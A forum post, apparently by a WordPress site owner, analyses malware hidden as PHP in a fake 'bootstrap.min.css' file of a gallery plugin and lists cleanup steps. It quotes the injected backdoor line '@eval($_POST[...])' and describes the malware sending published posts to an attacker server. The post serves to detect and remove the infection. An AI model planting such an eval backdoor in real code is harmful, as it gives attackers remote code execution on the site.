Hi!.
I searched the internet for a solution to this problem. I did not find anything, so I analyzed all my system manually and found the following regarding this hack.
– It hides in .css file and images (jpg, png, gif), in my case it was in the “Product Gallery Slider” plugin with the name “bootstrap.min.css” but it really is php.
– It is called at the beginning of the plugin. In my case, “require_once(dirname(__FILE__) .’/css/bootstrap.min.css’);” in woocommerce-slider.php.
– According to the code, it performs the following actions:
— Two new clases “WpPlLoadContent” and “WpPlaginLoad”
— Create mysql data in “postmeta” with meta_key “_wp_session_tocen_temporery”
— Send all post from “post WHERE post_status=”publish” AND (post_type=”post” OR post_type=”page”)” to one IP (hack server).
— Modify base archives:
* /wp-admin/includes/class-pclzip.php
* /wp-includes/SimplePie/Cache/File.php
— Insert code “@eval($_POST[“wp_ajx_request”]);” in:
* functions.php of the THEMES
* base file .php of the ACTIVE PLUGINS
— Create fake images with hack code (eval).
I clone your images with “filename”-122×356
Solution for this.
1o. Maintenance mode NOT REFRESH URL before finishing process (wp-admin yes)
2o. Search the fake css code ( Wordfence Hight Sensivity Scanner) or search manually (Dreamweaver or Notepad++)
3o. Remove or clear this hack file and search require or include this file.
5o. Remove all -122×365 images
6o. Replace base archives (class-pclzip.php and Cache/File.php)
7o. Sanitize all .php plugins files (remove @eval) for his code.
8o. Activate all plugins
9o. Run!.
Sorry my english, google traductor